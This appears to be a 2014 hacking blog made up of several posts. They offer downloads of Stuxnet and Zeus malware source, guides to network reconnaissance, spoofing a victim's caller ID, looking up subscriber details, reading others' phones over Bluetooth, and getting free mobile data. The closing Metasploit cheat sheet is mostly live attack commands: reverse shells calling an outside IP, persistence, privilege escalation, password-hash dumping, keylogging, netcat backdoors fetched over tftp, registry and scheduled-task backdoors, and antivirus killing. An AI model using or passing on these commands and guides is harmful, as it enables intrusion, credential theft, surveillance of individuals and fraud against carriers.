Ads 468x60px

Wednesday, 30 April 2014

Open Source Code

 HOC are not responsible for any kind of damage. All are open source code for knowledge purpose only...

Stuxnet Source Code:

Stuxnet is a Microsoft Windows computer worm discovered in July 2010 that targets industrial software and equipment.

What is Stuxnet:
Stuxnet is a computer worm that targets the types of industrial control systems (ICS)
 that are commonly used in infrastructure supporting facilities (i.e. power plants, water treatment facilities, gas lines, etc).


What does Stuxnet do:

Stuxnet is designed to programmatically alter Programmable Logic Controllers (PLCs) used in those facilities. In an ICS environment, the PLCs automate industrial type tasks such as regulating flow rate to maintain pressure and temperature controls.

PhotobucketDownload


Zeus Source Code:

What is Zeus:
Zeus, often spelled ZeuS, is a crimeware botnet typically engaged in data theft. Zeus is also often referred to as Zbot.
Zeus is not a single botnet nor a single trojan, but rather refers to an entire family of trojans and their respective botnets. Zeus bots undergo constant updates, sometimes several times a day, subsequently there are thousands of variants of Zeus.
Data theft activities range from large scale attacks on banks, to intellectual property theft from corporate and government victims, to phishing attacks on individuals.



PhotobucketDownload

Rar Password : zeus

Tuesday, 29 April 2014

Network Hacking

Ways To Attack a Network:
Ping
The IP address gives the attacker’s Internet address. The numerical address like 212.214.172.81 does not reveal much. You can use PING to convert the address into a domain name in WINDOWS: The Domain Name Service (DNS) protocol reveals the matching domain name.  PING stands for “Packet Internet Groper” and is delivered with practically every
Internet compatible system, including all current Windows versions.
Make sure you are logged on to the net. Open the DOS shell and enter
the following PING command:
Ping –a 123.123.12.1
Ping will search the domain name and reveal it. You will often have information on the provider the attacker uses e.g.:
 dialup21982.gateway123.provider.com
Pinging is normally the first step involved in hacking the target. Ping uses
ICMP (Internet Control Messaging Protocol) to determine whether the target host is reachable or not. Ping sends out ICMP Echo packets to the target host, if the target host is alive it would respond back with ICMP
Echo reply packets.
All the versions of Windows also contain the ping tool. To ping a remote host follow the procedure below.
Click Start and then click Run. Now type ping <ip address or hostname>
(For example: ping yahoo.com)
This means that the attacker logged on using “provider.com”.
Unfortunately, there are several IP addresses that cannot be converted
into domain names.
For more parameter that could be used with the ping command, go to
DOS prompt and type ping /?.

Ping Sweep
If you are undetermined about your target and just want a live system, ping sweep is the solution for you. Ping sweep also uses ICMP to scan for live systems in the specified range of IP addresses. Though Ping sweep is similar to ping but reduces the time involved in pinging a range of IP addresses. Nmap (http://www.insecure.org) also contains an option
to perform ping sweeps.

Tracert: 
 Tracert is another interesting tool available to find more interesting information about a remote host. Tracert also uses ICMP.
Tracert helps you to find out some information about the systems involved in sending data (packets) from source to destination. To perform a tracert follow the procedure below.
Tracer connects to the computer whose IP has been entered and reveals all stations starting from your Internet connection. Both the IP address as well as the domain name (if available) is displayed.
If PING cannot reveal a name, Traceroute will possibly deliver the name of the last or second last station to the attacker, which may enable conclusions concerning the name of the provider used by the attacker and the region from which the attacks are coming.

Go to DOS prompt and type tracert <destination address> 
 (For example: tracert yahoo.com).
But there are some tools available like Visual Traceroute which help you
even to find the geographical location of the routers involved.
http://www.visualware.com/visualroute


Port Scanning:-
After you have determined that your target system is alive the next  important step would be to perform a port scan on the target system.
There are a wide range of port scanners available for free. But many of  them uses outdated techniques for port scanning which could be easily recognized by the network administrator. Personally I like to use Nmap (http://www.insecure.org) which has a wide range of options. You can download the NmapWin and its source code from:
http://www.sourceforge.net/projects/nmapwin.


Apart from port scanning Nmap is capable of identifying the Operating system being used, Version numbers of various services running,
firewalls being used and a lot more.

Common ports:
Below is a list of some common ports and the respective services
running on the ports.
20 FTP data (File Transfer Protocol)
21 FTP (File Transfer Protocol)
22 SSH
23 Telnet
25 SMTP (Simple Mail Transfer Protocol)
53 DNS (Domain Name Service)
68 DHCP (Dynamic host Configuration Protocol)
79 Finger
80 HTTP
110 POP3 (Post Office Protocol, version 3)
137 NetBIOS-ns
138 NetBIOS-dgm
139 NetBIOS
143 IMAP (Internet Message Access Protocol)
161 SNMP (Simple Network Management Protocol)
194 IRC (Internet Relay Chat)
220 IMAP3 (Internet Message Access Protocol 3)
389 LDAP
443 SSL (Secure Socket Layer)
445 SMB (NetBIOS over TCP)
Besides the above ports they are even some ports known as Trojan
ports used by Trojans that allow remote access to that system.


Vulnerability Scanning:
Every operating system or the services will have some vulnerabilities due to the
programming errors. These vulnerabilities are crucial for a successful hack. Bugtraq is
an excellent mailing list discussing the vulnerabilities in the various system. The
exploit  code writers write exploit codes to exploit these vulnerabilities existing in a system.

There are a number of vulnerability scanners available to scan the host for known vulnerabilities. These vulnerability scanners are very important for a network administrator to audit the network security.
Some of such vulnerability scanners include Shadow Security Scanner,Stealth HTTP Scanner, Nessus, etc. Visit
http://www.securityfocus.com vulnerabilities and exploit codes of various
operating systems. Packet storm security
(http://www.packetstormsecurity.com) is also a nice pick.

Tools Descriptions:
1. Nmap
I think everyone has heard of this one, recently evolved into the 4.x series.
Nmap (Network Mapper) is a free open source utility for network exploration
or security auditing. It was designed to rapidly scan large networks, although
it works fine against single hosts. Nmap uses raw IP packets in novel ways to
determine what hosts are available on the network, what services (application
name and version) those hosts are offering, what operating systems (and OS
versions) they are running, what type of packet filters/firewalls are in use,
and dozens of other characteristics. Nmap runs on most types of computers and
both console and graphical versions are available. Nmap is free and open source.
Can be used by beginners (-sT) or by pros alike (packet_trace). A very
versatile tool, once you fully understand the results.

2. Nessus Remote Security Scanner
Recently went closed source, but is still essentially free. Works with a client-
server framework.
Nessus is the worlds most popular vulnerability scanner used in over 75,000
organizations world-wide. Many of the worlds largest organizations are
realizing significant cost savings by using Nessus to audit business-critical
enterprise devices and applications.

3. John the Ripper
Yes, JTR 1.7 was recently released!
John the Ripper is a fast password cracker, currently available for many
flavors of Unix (11 are officially supported, not counting different
architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect
weak Unix passwords. Besides several crypt(3) password hash types most commonly
found on various Unix flavors, supported out of the box are Kerberos AFS and
Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.
You can get JTR Here - http://www.openwall.com/john/

4. Nikto
Nikto is an Open Source (GPL) web server scanner which performs comprehensive
tests against web servers for multiple items, including over 3200 potentially
dangerous files/CGIs, versions on over 625 servers, and version specific
problems on over 230 servers. Scan items and plugins are frequently updated and
can be automatically updated (if desired).
Nikto is a good CGI scanner, there are some other tools that go well with Nikto
(focus on http fingerprinting or Google hacking/info gathering etc, another
article for just those).

5. SuperScan
Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the
highly popular Windows port scanning tool, SuperScan.
If you need an alternative for nmap on Windows with a decent interface, I
suggest you check this out, it’s pretty nice.
Get SuperScan Here - http://www.foundstone.com/index.htm
subnav=resources/navigation.htm&subcontent=/resources/proddesc/superscan4.htm

6. p0f
P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the
operating system on:
- machines that connect to your box (SYN mode),
- machines you connect to (SYN+ACK mode),
- machine you cannot connect to (RST+ mode),
- machines whose communications you can observe.
Basically it can fingerprint anything, just by listening, it doesn’t make ANY
active connections to the target machine.

7. Wireshark (Formely Ethereal)
Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you
capture and interactively browse the contents of network frames. The goal of
the project is to create a commercial-quality analyzer for Unix and to give
Wireshark features that are missing from closed-source sniffers.
Works great on both Linux and Windows (with a GUI), easy to use and can
reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.
Get Wireshark Here - http://www.wireshark.org/

8. Yersinia
Yersinia is a network tool designed to take advantage of some weakeness in
different Layer 2 protocols. It pretends to be a solid framework for analyzing
and testing the deployed networks and systems. Currently, the following network
protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery
Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration
Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch
Link Protocol (ISL), VLAN Trunking Protocol (VTP).
The best Layer 2 kit there is.
Get Yersinia Here - http://yersinia.sourceforge.net/

9. Eraser
Eraser is an advanced security tool (for Windows), which allows you to
completely remove sensitive data from your hard drive by overwriting it several
times with carefully selected patterns. Works with Windows 95, 98, ME, NT,
2000, XP and DOS. Eraser is Free software and its source code is released under
GNU General Public License.
An excellent tool for keeping your data really safe, if you’ve deleted it..make
sure it’s really gone, you don’t want it hanging around to bite you in the ass.

10. PuTTY
PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms,
along with an xterm terminal emulator. A must have for any h4. 0r wanting to
telnet or SSH from Windows without having to use the crappy default MS command
line clients.

11. LCP
Main purpose of LCP program is user account passwords auditing and recovery in
Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute
force session distribution, Hashes computing.
A good free alternative to L0phtcrack.
LCP was briefly mentioned in our well read Rainbow Tables and RainbowCrack
article.

12. Cain and Abel
My personal favourite for password cracking of any kind.
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It
allows easy recovery of various kind of passwords by sniffing the network,
cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis
attacks, recording VoIP conversations, decoding scrambled passwords, revealing
password boxes, uncovering cached passwords and analyzing routing protocols.
The program does not exploit any software vulnerabilities or bugs that could
not be fixed with little effort.
Get Cain and Abel Here - http://www.oxid.it/cain.html

13. Kismet
Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion
detection system. Kismet will work with any wireless card which supports raw
monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.
A good wireless tool as long as your card supports rfmon (look for an orinocco
gold).

14. NetStumbler
Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux
counterparts, but it’s easy to use and has a nice interface, good for the
basics of war-driving.
NetStumbler is a tool for Windows that allows you to detect Wireless Local Area
Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:
Verify that your network is set up the way you intended.
Find locations with poor coverage in your WLAN.
Detect other networks that may be causing interference on your network.
Detect unauthorized rogue access points in your workplace.
Help aim directional antennas for long-haul WLAN links.
Use it recreationally for WarDriving.
Get NetStumbler Here - http://www.stumbler.net/
15. Hping
To finish off, something a little more advanced if you want to test your TCP/IP
packet monkey skills.
hping is a command-line oriented TCP/IP packet assembler/analyzer. The
interface is inspired to the ping unix command, but hping isn’t only able to
send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a
traceroute mode, the ability to send files between a covered channel, and many
other features.
Get hping Here - http://www.hping.org/

Monday, 28 April 2014

Multi Yahoo&Gtlk


Yahoo Messenger trick-
How to open Multiple Yahoo Messenger?

multiyahoo
1. Go to start > Run > Type regedit > Press Enter
2. Click on the plus sign near the folder HKEY_CURRENT_USER
3. Click on the plus sign near the folder Software
4. Click on the plus sign near the folder Yahoo
5. Click on the plus sign near the folder Pager
6. Right Click on the folder name Test > New > DWORD Value
7. Right side you will get a file named New Value #1
8. Right Click on the file New Value #1 and Rename it as Plural and press enter
9. Double Click on the file Plural
10. You will get a windown named Edit DWORD Value
11. Type 1 inside 'Select the Value data' and press enter
12. Close the registery editor window
13. Now you can launch multiple windows and use different ID's.
Cheers!!!


Multiple Google talk login

Photobucket
1. Right-click on the desktop

2. Select New
3. Select Shortcut

4. Paste this into the text box:
"c:\program files\google\google talk\googletalk.exe" /nomutex
(dont miss even a comma)
5. Click Next
6. Name it whatever: Google Talk Multiple, etc.

7. Click OK until you are done.
ENJOY.....!~
  
Yahoo messengers hidden smileys...~!

:o3 <---------> puppy dog eyes - New!

:-?? <---------> I don't know - New!

%-( <---------> not listening

:@) <---------> pig

3:-O <---------> cow

:(|) <---------> monkey

~:> <---------> chicken

@};- <---------> Red rose

%%- <---------> good luck

**== <---------> flag

(~~) <---------> pumpkin

~O) <---------> coffee

*-:) <---------> idea

8-X <---------> skull

=:) <---------> bug

>-) <---------> alien

:-L <---------> frustrated

[-O< <---------> peace sign

[-X <---------> shame on you

\:D/ <---------> dancing

>:/ <---------> bring it on

;)) <---------> hee hee

:-@ <---------> chatterbox

^:)^ <---------> not worthy

:-j <---------> oh go on

(*) <---------> star

o-> <---------> hiro

o=> <---------> billy

o-+ <---------> april                

(%) <---------> yin yang

Sunday, 27 April 2014

Mobile Hack Tricks

Call Forging:

To call someone from their own number or any number.
1. Go to http://www.mobivox.com and register there for free account.

2. During registration, remember to insert Victim mobile number in "Phone number
"field as shown below.




3. Complete registration and confirm your email id and then login to your account.
click on "Direct WebCall".




4. You will arrive at page shown below. In "Enter a number" box, select your country
and also any mobile number(you can enter yours). Now, simply hit on "Call Now"
 button to call your friend with his own number.





5. That's it. Your friend will be shocked to see his own number calling him. I have
spent last two days simply playing this cool mobile hack prank.


Note: This trick will only knowledge purpose...
         Just try this trick only known person.



Trace MObile Location:

Click On Below Link To Trace Unknown Number ->
Trace Mobile Location 


Get USER info of any reliance No.

http://myservices.relianceada.com/captureInstantRecharge.do

1. Enter the number of whom u want details..

2. Enter any fake email id.

3. And then click Continue.

And now u will get a screen with the number and customer name.

Note :-
Please Dont misuse or over use it :|


Mobile Bluetooth Hacking:

Here is a list of what you can do when you have hacked the other phone. Have Fun!
  • Read Messages. (They are no more personal!)
  • Read Contacts. (Check your lover’s phonebook to see what name he/she has saved your name. Hey, please don’t suicide when you see he/she has saved your number as lover no. 9! HeHe)
  • Change Profile (Change the other’s profile to silent mode when you are on a date!)
  • Play Ringtone even if the phone is silent (Annoy your classmates!)
  • Play songs from the hacked phone in the same phone.
  • Restart the phone (Show some magic to your friends!)
  • Switch off the phone (Ultimate thing that you can do!)
  • Restore Factory Settings (Do this to the most organized one and run away quickly!)
  • Change Ringing Volume (You have enough experience how to use it. Don’t you?)
bluetooth-hack
Follow these steps to hack any Bluetooth enabled mobile phone.
  1. Download Super Bluetooth Hack 1.8 and also check that your mobile is in the list of supported handsets from the link provided. After you have downloaded the .jar file, install it in your mobile.
  2. There is no need to install the software in the mobile which you want to hack.
  3. Turn on the Bluetooth of your handset and open the Super Bluetooth Hack Application.
  4. Select the connect option and then Inquiry Devices to search for any of mobile that has its Bluetooth turned on nearby.
  5. Your friend’s Bluetooth must also be turned on to be found. Pairing between the devices is also necessary sometimes.
  6. Once your friend’s phone has been found, try out its functions!


100% Working Reliance GSM free GPRS Trick.... 

just DiAl *123*099#


Datz Done..!!!

ENjoy..!!
U will shortly Receive a massage saws sucessfully reacharged with Rs.99...!!!!

  It's working fine..!!!!!

Here is new trick..!!
First go here and give the required information

    http://rcom.co.in/rcom/rworld/music/mobileCallerUser_screen1.jsp?plan=postMobileNet
       -> Enter your name and reliance mobile number and you will get password by sms to the that given mobile no. ( Note :- Use 0 before your mobile no. like 0xxxxxxxx )

And Then you will receive some pin like password in your mobile by sms
->Keep the message open in mobile and get to computer

-> Now go to the below link and enter your mobile number and received pin.

    http://rcom.co.in/rcom/rworld/music/MobileAuthentication.jsp?AppID=109&plan=postMobileNet%2099

Now Take Your mobile and dail *367 and here the balance
Now enjoy free gprs for 1 month in mobile and pc.
Use Rcomnet Setting

After One month after the data or validity gets over deactivate the plan by calling customer care and then again click on the second link and get your plan activated

Done...!!!

Saturday, 26 April 2014

Miscellaneous Tools

L517 Wiord List Generator Tool
L517 is a word-list generator for the Windows Operating System. L517 is small (considering what it does), it is fast (considering it's a Windows app), and it is lightweight (when not loading astronomically large lists). A user-friendly GUI requires no memorization of command-line arguments!

L517 contains hundreds of options for generating a large, personalized, and/or generic wordlist. With L517, you can generate phone numbers, dates, or every possible password with only a few clicks of the keyboard; all the while, filtering unwanted passwords.

Collecting: Gathers words from many different file-types,

    .txt
    .mp3
    .pdf
    .ppt
    .srt
    .rtf
    .doc / .docx
    .htm / .html
    .jpg / .jpeg
    and many more
    Can handle both unix and windows text file types,
    Collect from every file in a directory (and subdirectories),
    Collect words from a website (strips HTML code), good for personalized wordlists (myspace, facebook, etc),
    Collect from dragged-and-dropped selected text or files,
    Collect words from pasted text (Ctrl+V).

L517 requires MSVBVM60.DLL and MSCOMCTL.OCX in order to run.

Download Link


XMPPloit

XMPPloit is a command-line tool to attack XMPP connections, allowing the attacker to place a gateway between the client and the server and perform different attacks on the client stream.

The tool exploit implements vulnerabilities at the client & server side utilizing the XMPP protocol. XMPP is a protocol for communication and so is HTTP. Both XMPP and HTTP will internally use socket connections.
The main goal is that all the process is transparently for the user and never replace any certificate (like HTTPS attacks).

Features
  •     Downgrade the authentication mechanism (can obtain the user credentials)
  •     Force the client not to use an encrypted communication
  •     Set filters for traffic manipulation

Download

Friday, 25 April 2014

Mobile Hacking Tools

AnDOSid: DOS Tool For Android Mobile



AnDOSid is designed for security professionals only!
AnDOSid tag’s posts with two unique numbers which relate to the Android device that sent the request.

AnDOSid allows security professionals to simulate a DOS attack (A http post flood
attack to be exact) and of course a dDOS on a web server, from mobile phones.


AnDOSid is actively being developed and I welcome feedback from the security community as to how you would like the application to evolve.
A new product released by SCOTT HERBERT for Android mobile phones,Its AnDOSid - the DOS tool for Android Phones. The rise of groups like Anonymous and LuzSec, as well as constant India / Pakistan cyberwar has raised the issue of cyber-security higher in the minds of web owners.

Pentesting tools exist to simulate such attacks and help website security people defend against them, however for the most part they currently only exist for desktop computers. Mobile phones have, over the last few years, grown from simple devices
that send and receive calls to mobile computing platforms which can be purchased for less than $100 a device.


AnDOSid fills that gap, allowing security professionals to simulate a DOS attack (An
http post flood attack to be exact) and of course a dDOS on a web server, from mobile phones. 
AnDOSid is actively being developed and I welcome feedback from the
security community as to how you would like the application to evolve.



What's in this version:

  • Requires Internet access to send the http post data
  • Requires phone state to access the IMEI (one of the two identifiers sent with 
  • each post)
AnDOSid can be downloaded from the Android Market place and costs just £1 or Rs.74.58/-Only.

More Info

Spoof Tooph 0.5: To Automate Cloning of Bluetooth devices


SpoofTooph is designed to automate spoofing or cloning Bluetooth device Name, Class, and Address. Cloning this information effectively allows Bluetooth device to hide in plain site. Bluetooth scanning software will only list one of the devices if more than one device in range shares the same device information when the devices are in Discoverable Mode (specifically the same Address)
Change Log v0.5:
- Fixed segmentation fault in manual assigning of Device Name and Class of Device
- Modified flags
- Depreciated
     -r: Assign random NAME, CLASS, and ADDR
     -l : Load SpoofTooph CSV logfile
     -d : Dump scan into SpoofTooph CSV logfile
- New
     -w : Write to CSV file
     -r : Read from CSV file
     -R: Assign random NAME, CLASS, and ADDR
     -m: Specify multiple interfaces during selection
     -u: USB delay. Interactive delay for reinitializing interfaces

Download

Tuesday, 22 April 2014

Metasploit Cheatsheet

Cheat sheet of Metasploit... Commands are as follows .. 


use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST rmccurdy.com
set LPORT 21
set ExitOnSession false
# set AutoRunScript pathto script you want to autorun after exploit is run
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30

exploit -j -z

_________________________________________________________________

# file_autopwn
rm -Rf /tmp/1
mkdir /tmp/1
rm -Rf ~/.msf3

wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressR...s/nga10_02.pdf

./msfconsole

db_driver sqlite3
db_create pentest11
setg LHOST 75.139.158.51
setg LPORT 21
setg SRVPORT 21
setg LPORT_WIN32 21

setg INFILENAME /tmp/file3.pdf

use auxiliary/server/file_autopwn

set OUTPATH /tmp/1

set URIPATH /msf
set SSL true
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
setg PAYLOAD windows/meterpreter/reverse_tcp
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
run

__________________________________________________________________

# shows all the scripts
run [tab]
__________________________________________________________________

# persistence! broken ...if you use DNS name ..
run persistence -r 75.139.158.51 -p 21 -A -X -i 30

__________________________________________________________________

run get_pidgin_creds

idletime
sysinfo

__________________________________________________________________

# SYSTEM SHELL ( pick a proc that is run by system )
migrate 376
shell
__________________________________________________________________

# session hijack tokens
use incognito
impersonate_token "NT AUTHORITY\\SYSTEM"
__________________________________________________________________

# escalate to system
use priv
getsystem
__________________________________________________________________

execute -f cmd.exe -H -c -i -t
execute -f cmd.exe -i -t
__________________________________________________________________

# list top used apps
run prefetchtool -x 20
__________________________________________________________________

# list installed apps

run prefetchtool -p
__________________________________________________________________

run get_local_subnets

__________________________________________________________________

# find and download files

run search_dwld "%USERPROFILE%\\my documents" passwd
run search_dwld "%USERPROFILE%\\desktop passwd
run search_dwld "%USERPROFILE%\\my documents" office
run search_dwld "%USERPROFILE%\\desktop" office

__________________________________________________________________

# alternate

download -r "%USERPROFILE%\\desktop" ~/
download -r "%USERPROFILE%\\my documents" ~/
__________________________________________________________________

# alternate to shell not SYSTEM

# execute -f cmd.exe -H -c -i -t
__________________________________________________________________

# does some run wmic commands etc

run winenum
# rev shell the hard way
run scheduleme -m 1 -u /tmp/nc.exe -o "-e cmd.exe -L -p 8080"
__________________________________________________________________

# An example of a run of the file to download via tftp of Netcat and then running it as a backdoor.
run schtasksabuse-dev -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
run schtasksabuse -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
__________________________________________________________________

# vnc / port fwd for linux
run vnc
__________________________________________________________________
# priv esc
run kitrap0d

__________________________________________________________________

run getgui
__________________________________________________________________

# somewhat broken .. google sdt cleaner NtTerminateProcess !@?!?!
run killav

run winemun

run memdump

run screen_unlock
__________________________________________________________________

upload /tmp/system32.exe C:\\windows\\system32\\
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion \\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion \\run -v system32 -d "C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe"
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion \\Run -v system32
reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list
reg setval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v sys
reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v system32
upload /neo/wallpaper1.bmp "C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\"

__________________________________________________________________

getuid
ps
getpid
keyscan_start
keyscan_dump
migrate 520
portfwd add -L 104.4.4 -l 6666 -r 192.168.1.1 -p 80"
portfwd add -L 192.168.1.1 -l -r 10.5.5.5 -p 6666
__________________________________________________________________

shell
run myremotefileserver_mserver -h
run myremotefileserver_mserver -p 8787
__________________________________________________________________

run msf_bind

run msf_bind -p 1975
rev2self
getuid
__________________________________________________________________

getuid


enumdesktops
grabdesktop

run deploymsf -f framework-3.3-dev.exe

run hashdump
run metsvc
run scraper
run checkvm
run keylogrecorder
run netenum -fl -hl localhostlist.txt -d google.com
run netenum -rl -r 10.192.0.50-10.192.0.254
run netenum -st -d google.com
run netenum -ps -r 10.192.0.50-254

___________________________________________________________________

# Windows Login Brute Force Meterpreter Script

run winbf -h
___________________________________________________________________

# upload a script or executable and run it

uploadexec

___________________________________________________________________

# Using Payload As A Backdoor from a shell


REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\metabkdr.exe" /f
at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\metabkdr.exe"
SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\metabkdr.exe" /ED 11/11/2011

___________________________________________________________________

# kill AV this will not unload it from mem it needs reboot or kill from memory still ... Darkspy, Seem, Icesword GUI can kill the tasks
catchme.exe -K "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -E "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -O "c:\Program Files\Kaspersky\avp.exe" dummy


Cheatsheet by Kislay Bhardwaj. He is a Security Researcher Follow: Facebook , Twitter
 

Adf.ly


SociBuzz

EasyHits4U

The Most Popular Traffic Exchange

URLcash